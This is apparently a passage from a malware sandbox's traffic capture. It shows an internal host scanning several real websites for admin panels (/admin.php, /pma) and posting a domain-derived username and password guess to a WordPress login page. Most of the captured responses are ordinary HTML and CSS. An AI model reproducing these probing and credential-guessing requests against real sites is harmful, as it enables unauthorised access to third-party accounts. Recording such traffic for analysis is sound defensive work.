2024-02-20 23:26:25 UTC	16384	IN	Data Raw: c3 a9 72 65 72 20 64 65 73 20 70 72 6f 66 65 73 73 69 6f 6e 6e 65 6c 73 20 64 75 20 6d c3 a9 74 69 65 72 20 64 75 20 76 69 74 72 61 67 65 20 61 75 74 6f 75 72 20 64 e2 80 99 75 6e 65 20 65 6e 73 65 69 67 6e 65 20 6e 61 74 69 6f 6e 61 6c 65 2e 3c 2f 73 70 61 6e 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0d 0a 66 66 66 38 0d 0a 0a 09 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 77 70 62 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 20 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 76 63 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 20 77 70 62 5f 61 6e 69 6d 61 74 65 5f 77 68 65 6e 5f 61 6c 6d 6f 73 74 5f 76 69 73 69 62 6c 65 20 77 70 62 5f 66 61 64 65 49 6e 20 66 61 64 65 49 6e 20 76 63 5f Data Ascii: rer des professionnels du mtier du vitrage autour dune enseigne nationale.</span></strong></span></p></div></div>fff8<div class="wpb_single_image wpb_content_element vc_align_left wpb_animate_when_almost_visible wpb_fadeIn fadeIn vc_
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2e 6a 70 67 20 35 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2d 32 37 30 78 33 30 30 2e 6a 70 67 20 32 37 30 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2d 31 33 32 78 31 34 36 2e 6a 70 67 20 31 33 32 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e Data Ascii: -content/uploads/glazing-valeurs.jpg 500w, https://www.glazing-bt.com/wp-content/uploads/glazing-valeurs-270x300.jpg 270w, https://www.glazing-bt.com/wp-content/uploads/glazing-valeurs-132x146.jpg 132w, https://www.glazing-bt.com/wp-content/uploads/glazin

Session ID	Source IP	Source Port	Destination IP	Destination Port
322	192.168.2.6	59812	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	175	OUT	GET /admin.php HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:25 UTC	520	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:24 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/" X-TEC-API-VERSION: v1 X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/ X-TEC-API-ORIGIN: https://ksv-schwimmen.de Vary: User-Agent Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:25 UTC	7672	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 4b 53 56 20 4e 65 70 74 75 6e 20 31 38 38 39 Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Seite nicht gefunden – KSV Neptun 1889
2024-02-20 23:26:25 UTC	526	IN	Data Raw: 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 68 6f 76 65 72 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 66 6f 63 75 73 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d Data Ascii: e="radio"]:checked,input[type=reset],input[type="checkbox"]:checked,input[type="checkbox"]:hover:checked,input[type="checkbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:var(--ast-global-color-0);background-color:var(--ast-global-
2024-02-20 23:26:25 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:25 UTC	5762	IN	Data Raw: 31 36 37 61 0d 0a 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b Data Ascii: 167atry-meta,.entry-meta {line-height:1.45;color:var(--ast-global-color-0);}.entry-meta a:not(.ast-button):hover,.entry-meta a:not(.ast-button):hover ,.entry-meta a:not(.ast-button):focus,.entry-meta a:not(.ast-button):focus *,.page-links > .page-link
2024-02-20 23:26:25 UTC	1455	IN	Data Raw: 35 61 38 0d 0a 73 65 63 74 69 6f 6e 20 69 6d 67 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 20 63 6f 76 65 72 3b 7d 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 69 74 65 2d 63 6f 6e 74 65 6e 74 20 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 2d 66 65 61 74 75 72 65 64 2d 73 65 63 74 69 6f 6e 20 2b 20 61 72 74 69 63 6c 65 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 38 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 20 39 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 32 32 70 78 29 20 7b 2e 61 73 74 2d 6e 6f 2d 73 69 64 Data Ascii: 5a8section img {width: 100%;overflow: hidden;object-fit: cover;}.ast-separate-container .site-content .ast-single-post-featured-section + article {margin-top: -80px;z-index: 9;position: relative;border-radius: 4px;}@media (min-width: 922px) {.ast-no-sid
2024-02-20 23:26:25 UTC	8192	IN	Data Raw: 33 64 65 0d 0a 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 2c 64 69 76 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 7b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d Data Ascii: 3debutton.is-style-outline > .wp-block-button__link:not(.has-text-color),div.wp-block-button.wp-block-button__link.is-style-outline:not(.has-text-color){color:#000000;}.wp-block-button.is-style-outline .wp-block-button__link:hover,.wp-block-buttons .wp-
2024-02-20 23:26:25 UTC	1003	IN	Data Raw: 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 32 30 70 78 20 2d 20 33 70 78 29 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 73 74 61 63 6b 20 2e 6d 61 69 6e 2d 68 65 61 64 65 72 2d 62 61 72 20 2e 61 73 74 2d 73 65 61 72 63 68 2d 6d 65 6e 75 2d 69 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 2e 61 73 74 2d 68 65 61 64 65 72 2d 63 75 73 74 6f 6d 2d 69 74 65 6d 2d 6f 75 74 73 69 64 65 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 73 74 61 63 6b 20 2e 6d 61 69 6e 2d 68 65 61 64 65 72 2d 62 61 72 20 2e 61 73 74 2d 73 65 61 72 63 68 2d 69 63 6f 6e 7b Data Ascii: adding-left:calc(20px - 3px);}@media (max-width:921px){.ast-mobile-header-stack .main-header-bar .ast-search-menu-icon{display:inline-block;}.ast-header-break-point.ast-header-custom-item-outside .ast-mobile-header-stack .main-header-bar .ast-search-icon{
2024-02-20 23:26:25 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:25 UTC	6738	IN	Data Raw: 31 61 34 61 0d 0a 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d Data Ascii: 1a4ast-separate-container{background-color:var(--ast-global-color-5);;background-image:none;;}@media (max-width:921px){.widget-title{font-size:22px;font-size:1.375rem;}body,button,input,select,textarea,.ast-button,.ast-custom-button{font-size:16px;font-
2024-02-20 23:26:25 UTC	1455	IN	Data Raw: 35 61 38 0d 0a 74 20 7b 70 61 64 64 69 6e 67 3a 20 38 25 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2d 74 65 78 74 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 62 61 Data Ascii: 5a8t {padding: 8%;}.entry-content .wp-block-cover:not([class="background-color"]) .wp-block-cover__inner-container,.entry-content .wp-block-cover:not([class="background-color"]) .wp-block-cover-image-text,.entry-content .wp-block-cover:not([class*="ba

Session ID	Source IP	Source Port	Destination IP	Destination Port
323	192.168.2.6	60440	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	362	OUT	POST /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/wp-login.php Content-Length: 152 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:24 UTC	152	OUT	Data Raw: 6c 6f 67 3d 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 26 70 77 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=fortressrealcapital&pwd=fortress%21&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ffortressrealcapital.com%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:25 UTC	808	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tJZIpaNSVDI6fyP81W9UcYOqwgL7sL224o1bghfuB3Lq%2BEuRDKXi%2FzSe9n2xmmehfhOIQZjllIpYYwFNsGePeVUjWpPIt03NL1DvJF5c6QnN%2B%2FqvreiQr2b%2FpjFyjAr0c6LLWxc12w5JkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a83aa0f484252-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:25 UTC	561	IN	Data Raw: 31 62 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1bca<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 Data Ascii: ='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type='t
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 6e 6f 74 69 63 65 20 6e 6f 74 69 63 65 2d 65 72 72 6f 72 22 3e 3c 70 3e 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 3a 3c 2f 73 74 72 6f 6e 67 3e 20 54 68 65 20 75 73 65 72 6e 61 6d 65 20 3c 73 74 72 6f 6e 67 3e 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 3c 2f 73 74 72 6f 6e 67 3e 20 69 73 20 6e 6f 74 20 72 65 67 69 73 74 65 72 65 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 20 49 66 20 79 6f 75 20 61 72 65 20 75 6e 73 75 72 65 20 6f 66 20 79 6f 75 72 20 75 73 65 72 6e 61 6d Data Ascii: a href="https://wordpress.org/">Powered by WordPress</a></h1><div id="login_error" class="notice notice-error"><p><strong>Error:</strong> The username <strong>fortressrealcapital</strong> is not registered on this site. If you are unsure of your usernam
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 6d 65 6d 62 65 72 20 4d 65 3c 2f 6c 61 62 65 6c 3e 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 6e 61 6d 65 3d 22 77 70 2d 73 75 62 6d 69 74 22 20 69 64 3d 22 77 70 2d 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 62 75 74 74 6f 6e 2d 6c 61 72 67 65 22 20 76 61 6c 75 65 3d 22 4c 6f 67 20 49 6e 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 64 69 72 65 63 74 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 Data Ascii: member Me</label></p><p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" /><input type="hidden" name="redirect_to" value="https://fortressrealcapital.com/wp-ad
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 7a 78 63 76 62 6e 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 7a 78 63 76 62 6e 2e 6d 69 6e 2e 6a 73 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 Data Ascii: ype="text/javascript" id="zxcvbn-async-js-extra">/* <![CDATA[ /var _zxcvbnSettings = {"src":"https:\/\/fortressrealcapital.com\/wp-includes\/js\/zxcvbn.min.js"};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp
2024-02-20 23:26:25 UTC	1085	IN	Data Raw: 2a 2f 0a 76 61 72 20 70 77 73 4c 31 30 6e 20 3d 20 7b 22 75 6e 6b 6e 6f 77 6e 22 3a 22 50 61 73 73 77 6f 72 64 20 73 74 72 65 6e 67 74 68 20 75 6e 6b 6e 6f 77 6e 22 2c 22 73 68 6f 72 74 22 3a 22 56 65 72 79 20 77 65 61 6b 22 2c 22 62 61 64 22 3a 22 57 65 61 6b 22 2c 22 67 6f 6f 64 22 3a 22 4d 65 64 69 75 6d 22 2c 22 73 74 72 6f 6e 67 22 3a 22 53 74 72 6f 6e 67 22 2c 22 6d 69 73 6d 61 74 63 68 22 3a 22 4d 69 73 6d 61 74 63 68 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 70 61 73 73 77 6f 72 64 Data Ascii: /var pwsL10n = {"unknown":"Password strength unknown","short":"Very weak","bad":"Weak","good":"Medium","strong":"Strong","mismatch":"Mismatch"};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-admin/js/password
2024-02-20 23:26:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
324	192.168.2.6	60271	15.161.71.77	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	175	OUT	GET /pma HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	418	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:24 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Cache-Control: no-cache, private Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:24 UTC	7	IN	Data Raw: 31 62 66 63 65 0d 0a Data Ascii: 1bfce
2024-02-20 23:26:24 UTC	16384	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 30 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 61 20 70 61 67 69 6e 61 20 6e 6f 6e 20 c3 a8 20 73 74 61 Data Ascii: <!doctype html><html 